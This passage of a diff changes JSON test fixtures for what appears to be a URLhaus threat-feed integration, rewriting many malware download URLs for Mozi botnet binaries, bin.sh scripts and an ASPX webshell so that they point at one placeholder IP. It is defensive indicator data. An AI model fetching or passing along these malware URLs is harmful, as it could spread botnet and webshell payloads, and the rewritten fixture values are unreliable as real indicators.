"{\"id\":\"961016\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961016/\",\"url\":\"http://89.160.20.156:49608/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25857,18 +25857,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://112.168.65.51:41143/bin.sh", + "original": "http://89.160.20.156:41143/bin.sh", "scheme": "http", "port": 41143, - "domain": "112.168.65.51", - "full": "http://112.168.65.51:41143/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41143/bin.sh" }, - "ip": "112.168.65.51" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694494074Z", - "original": "{\"id\":\"961013\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961013/\",\"url\":\"http://112.168.65.51:41143/bin.sh\",\"url_status\":\"online\",\"host\":\"112.168.65.51\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028407100Z", + "original": "{\"id\":\"961013\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961013/\",\"url\":\"http://89.160.20.156:41143/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25906,18 +25906,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.204.147:42129/Mozi.m", + "original": "http://89.160.20.156:42129/Mozi.m", "scheme": "http", "port": 42129, - "domain": "117.247.204.147", - "full": "http://117.247.204.147:42129/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42129/Mozi.m" }, - "ip": "117.247.204.147" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694497330Z", - "original": "{\"id\":\"961014\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961014/\",\"url\":\"http://117.247.204.147:42129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.204.147\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028414Z", + "original": "{\"id\":\"961014\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961014/\",\"url\":\"http://89.160.20.156:42129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -25955,18 +25955,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.204.127:47403/Mozi.m", + "original": "http://89.160.20.156:47403/Mozi.m", "scheme": "http", "port": 47403, - "domain": "117.247.204.127", - "full": "http://117.247.204.127:47403/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47403/Mozi.m" }, - "ip": "117.247.204.127" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694500666Z", - "original": "{\"id\":\"961015\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961015/\",\"url\":\"http://117.247.204.127:47403/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.204.127\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028420900Z", + "original": "{\"id\":\"961015\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961015/\",\"url\":\"http://89.160.20.156:47403/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26004,18 +26004,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.184.207:60187/Mozi.m", + "original": "http://89.160.20.156:60187/Mozi.m", "scheme": "http", "port": 60187, - "domain": "120.85.184.207", - "full": "http://120.85.184.207:60187/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60187/Mozi.m" }, - "ip": "120.85.184.207" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694503882Z", - "original": "{\"id\":\"961011\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961011/\",\"url\":\"http://120.85.184.207:60187/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.184.207\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028427900Z", + "original": "{\"id\":\"961011\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961011/\",\"url\":\"http://89.160.20.156:60187/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26053,18 +26053,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.202.70.191:46097/Mozi.m", + "original": "http://89.160.20.156:46097/Mozi.m", "scheme": "http", "port": 46097, - "domain": "117.202.70.191", - "full": "http://117.202.70.191:46097/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46097/Mozi.m" }, - "ip": "117.202.70.191" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694507118Z", - "original": "{\"id\":\"961012\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961012/\",\"url\":\"http://117.202.70.191:46097/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.202.70.191\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028434800Z", + "original": "{\"id\":\"961012\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961012/\",\"url\":\"http://89.160.20.156:46097/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26102,18 +26102,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://211.223.74.229:50771/i", + "original": "http://89.160.20.156:50771/i", "scheme": "http", "port": 50771, - "domain": "211.223.74.229", - "full": "http://211.223.74.229:50771/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50771/i" }, - "ip": "211.223.74.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694510404Z", - "original": "{\"id\":\"961010\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961010/\",\"url\":\"http://211.223.74.229:50771/i\",\"url_status\":\"online\",\"host\":\"211.223.74.229\",\"date_added\":\"2021-01-14 16:31:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028441700Z", + "original": "{\"id\":\"961010\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961010/\",\"url\":\"http://89.160.20.156:50771/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:31:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26158,7 +26158,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694514031Z", + "ingested": "2021-12-13T08:40:08.028448600Z", "original": "{\"id\":\"961009\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961009/\",\"url\":\"https://pastebin.com/raw/00aUJCLx\",\"url_status\":\"offline\",\"host\":\"pastebin.com\",\"date_added\":\"2021-01-14 16:29:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"pmelson\",\"larted\":\"false\",\"tags\":[\"ASPXShell\",\"webshell\"]}", "category": "threat", "type": "indicator", @@ -26198,18 +26198,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://115.56.31.76:45117/bin.sh", + "original": "http://89.160.20.156:45117/bin.sh", "scheme": "http", "port": 45117, - "domain": "115.56.31.76", - "full": "http://115.56.31.76:45117/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45117/bin.sh" }, - "ip": "115.56.31.76" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694517457Z", - "original": "{\"id\":\"961008\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961008/\",\"url\":\"http://115.56.31.76:45117/bin.sh\",\"url_status\":\"online\",\"host\":\"115.56.31.76\",\"date_added\":\"2021-01-14 16:25:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028455600Z", + "original": "{\"id\":\"961008\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961008/\",\"url\":\"http://89.160.20.156:45117/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:25:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26247,18 +26247,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://49.68.80.149:41485/Mozi.a", + "original": "http://89.160.20.156:41485/Mozi.a", "scheme": "http", "port": 41485, - "domain": "49.68.80.149", - "full": "http://49.68.80.149:41485/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41485/Mozi.a" }, - "ip": "49.68.80.149" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694521094Z", - "original": "{\"id\":\"961007\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961007/\",\"url\":\"http://49.68.80.149:41485/Mozi.a\",\"url_status\":\"online\",\"host\":\"49.68.80.149\",\"date_added\":\"2021-01-14 16:22:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028462600Z", + "original": "{\"id\":\"961007\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961007/\",\"url\":\"http://89.160.20.156:41485/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26296,18 +26296,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.164.52:43851/Mozi.m", + "original": "http://89.160.20.156:43851/Mozi.m", "scheme": "http", "port": 43851, - "domain": "61.52.164.52", - "full": "http://61.52.164.52:43851/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43851/Mozi.m" }, - "ip": "61.52.164.52" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694524531Z", - "original": "{\"id\":\"961006\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961006/\",\"url\":\"http://61.52.164.52:43851/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.164.52\",\"date_added\":\"2021-01-14 16:22:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028470100Z", + "original": "{\"id\":\"961006\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961006/\",\"url\":\"http://89.160.20.156:43851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26345,18 +26345,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.95.174.179:37095/Mozi.m", + "original": "http://89.160.20.156:37095/Mozi.m", "scheme": "http", "port": 37095, - "domain": "59.95.174.179", - "full": "http://59.95.174.179:37095/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37095/Mozi.m" }, - "ip": "59.95.174.179" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694527947Z", - "original": "{\"id\":\"961005\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961005/\",\"url\":\"http://59.95.174.179:37095/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.95.174.179\",\"date_added\":\"2021-01-14 16:22:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028477500Z", + "original": "{\"id\":\"961005\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961005/\",\"url\":\"http://89.160.20.156:37095/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26394,18 +26394,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.18.32:59275/Mozi.m", + "original": "http://89.160.20.156:59275/Mozi.m", "scheme": "http", "port": 59275, - "domain": "58.249.18.32", - "full": "http://58.249.18.32:59275/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59275/Mozi.m" }, - "ip": "58.249.18.32" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694531654Z", - "original": "{\"id\":\"961004\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961004/\",\"url\":\"http://58.249.18.32:59275/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.18.32\",\"date_added\":\"2021-01-14 16:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028484500Z", + "original": "{\"id\":\"961004\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961004/\",\"url\":\"http://89.160.20.156:59275/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26443,18 +26443,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://83.224.148.209:46131/Mozi.m", + "original": "http://89.160.20.156:46131/Mozi.m", "scheme": "http", "port": 46131, - "domain": "83.224.148.209", - "full": "http://83.224.148.209:46131/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46131/Mozi.m" }, - "ip": "83.224.148.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694534910Z", - "original": "{\"id\":\"961002\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961002/\",\"url\":\"http://83.224.148.209:46131/Mozi.m\",\"url_status\":\"offline\",\"host\":\"83.224.148.209\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028491400Z", + "original": "{\"id\":\"961002\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961002/\",\"url\":\"http://89.160.20.156:46131/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26492,18 +26492,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.93.203:40129/Mozi.m", + "original": "http://89.160.20.156:40129/Mozi.m", "scheme": "http", "port": 40129, - "domain": "59.99.93.203", - "full": "http://59.99.93.203:40129/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40129/Mozi.m" }, - "ip": "59.99.93.203" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694538627Z", - "original": "{\"id\":\"961003\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961003/\",\"url\":\"http://59.99.93.203:40129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.93.203\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028498300Z", + "original": "{\"id\":\"961003\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961003/\",\"url\":\"http://89.160.20.156:40129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26541,18 +26541,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.204.253.74:43924/Mozi.m", + "original": "http://89.160.20.156:43924/Mozi.m", "scheme": "http", "port": 43924, - "domain": "27.204.253.74", - "full": "http://27.204.253.74:43924/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43924/Mozi.m" }, - "ip": "27.204.253.74" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694541923Z", - "original": "{\"id\":\"961000\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961000/\",\"url\":\"http://27.204.253.74:43924/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.204.253.74\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028505200Z", + "original": "{\"id\":\"961000\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961000/\",\"url\":\"http://89.160.20.156:43924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26590,18 +26590,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://117.247.202.55:38851/i", + "original": "http://89.160.20.156:38851/i", "scheme": "http", "port": 38851, - "domain": "117.247.202.55", - "full": "http://117.247.202.55:38851/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38851/i" }, - "ip": "117.247.202.55" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694545240Z", - "original": "{\"id\":\"961001\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961001/\",\"url\":\"http://117.247.202.55:38851/i\",\"url_status\":\"offline\",\"host\":\"117.247.202.55\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.028512200Z", + "original": "{\"id\":\"961001\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961001/\",\"url\":\"http://89.160.20.156:38851/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26639,18 +26639,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.13.139:33008/Mozi.m", + "original": "http://89.160.20.156:33008/Mozi.m", "scheme": "http", "port": 33008, - "domain": "125.44.13.139", - "full": "http://125.44.13.139:33008/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33008/Mozi.m" }, - "ip": "125.44.13.139" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694548456Z", - "original": "{\"id\":\"960996\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960996/\",\"url\":\"http://125.44.13.139:33008/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.44.13.139\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028519100Z", + "original": "{\"id\":\"960996\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960996/\",\"url\":\"http://89.160.20.156:33008/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26688,18 +26688,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.46.165.217:60201/Mozi.m", + "original": "http://89.160.20.156:60201/Mozi.m", "scheme": "http", "port": 60201, - "domain": "125.46.165.217", - "full": "http://125.46.165.217:60201/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60201/Mozi.m" }, - "ip": "125.46.165.217" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694552313Z", - "original": "{\"id\":\"960997\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960997/\",\"url\":\"http://125.46.165.217:60201/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.46.165.217\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028526500Z", + "original": "{\"id\":\"960997\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960997/\",\"url\":\"http://89.160.20.156:60201/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26737,18 +26737,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.116.38:41479/Mozi.m", + "original": "http://89.160.20.156:41479/Mozi.m", "scheme": "http", "port": 41479, - "domain": "182.119.116.38", - "full": "http://182.119.116.38:41479/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41479/Mozi.m" }, - "ip": "182.119.116.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694555529Z", - "original": "{\"id\":\"960998\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960998/\",\"url\":\"http://182.119.116.38:41479/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.116.38\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028533600Z", + "original": "{\"id\":\"960998\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960998/\",\"url\":\"http://89.160.20.156:41479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26786,18 +26786,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.228.41.177:52003/Mozi.m", + "original": "http://89.160.20.156:52003/Mozi.m", "scheme": "http", "port": 52003, - "domain": 